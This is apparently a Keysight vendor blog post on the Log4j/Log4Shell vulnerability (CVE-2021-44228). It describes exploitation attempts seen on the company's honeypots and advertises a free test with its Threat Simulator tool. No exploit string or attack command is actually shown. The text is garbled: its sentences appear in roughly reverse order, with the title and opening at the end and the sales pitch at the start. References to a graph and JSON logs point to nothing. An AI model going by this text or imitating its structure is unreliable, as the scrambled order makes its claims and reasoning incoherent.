An element of Keysight’s Security Operations Suite, Threat Simulator is a breach and attack simulation tool that safely simulates attacks against your network, endpoints, email, and perimeter defense systems to highlight any areas where your protection falls short. That’s why we’re offering a free Log4j vulnerability assessment via Keysight Threat Simulator. Due to the urgency and severity of the issue, and the exposure level so many will have, it’s also a very good idea to test your protection. However, as an immediate safeguard, it’s also quick and prudent to implement perimeter screening on your WAF, IDS/IPS, or NGFW in parallel. Of course, we recommend that you update your vulnerable systems as quickly as possible. Live Log4j exploit JSON from honeypot HOW CAN YOU PROTECT YOURSELF FROM LOG4J? We’ve seen this attempt executed over LDAP and DNS, but other mechanisms are possible. As you can see, the attacker is trying to trick our system (not vulnerable) into fetching code from the \securityscan, which would then be executed locally. We’ve changed the IP addresses to obscure both our IP addresses and those of the attacker, but make no mistake: this is a real attack attempt. What do these attacks look like in real life? Here’s a look at some JSON logs pulled from one of our honeypots. As you can see from the graph below, Log4j exploitation attempts against our honeypots were exploding by late Saturday. CVE-2021-44228 was just released Friday afternoon. Keysight operates a global honeypot network, which we use to track the various malware and other attacks hackers are employing each and every day. Let’s take a look at what we’ve observed of the attack directly. We can help with that - and it won’t cost you a dime. That’s why it’s a good idea to test your protection to validate it’s working as expected while you work on system patching. However, screening for Log4j attacks is decidedly nontrivial. But given the realities of holiday staffing and system uptime demands, patching may be difficult to expedite - so WAFs and Next-Gen Firewalls will be called into service as front-line protection until system vulnerabilities are directly addressed. Given the severity, 10 out of 10, of the vulnerability and the widespread exploitation attempts we are seeing in the wild, it’s extremely important to mitigate the threat as quickly as possible. At this moment, network and security teams are racing to mitigate the threats to their systems via a combination of updating to Log4j 2.15, the latest version of the software, and enabling screening protection on perimeter devices. There are plenty of sources for that online. We’re not trying to fully document the technical aspects of the attack here. It enables arbitrary code execution on a target’s system.It affects JNDI library, which is incredibly widespread.So, why is everyone so worried about Log4j? In short, there are three factors combining to make this a “perfect storm” of a vulnerability: You can read all the gory details documented in CVE-2021-44228, but here’s the bottom line: this has the potential to be really, really bad. Over the last 72 hours or so, most of the cybersecurity world has become aware of the Log4j / Log4Shell zero-day vulnerability and its widespread impact on most web servers, cloud applications, internet appliances, and embedded devices. If you are interested in how Keysight can validate your perimeter security protection from Log4J, read on. If you are looking for information about Log4J impact on Keysight products, please visit our Product and Solution Cyber Security page. Log4J / Log4Shell: Is Your Network Safe? Find Out for Free with Keysight
0 Comments
Leave a Reply. |
AuthorWrite something about yourself. No need to be fancy, just an overview. ArchivesCategories |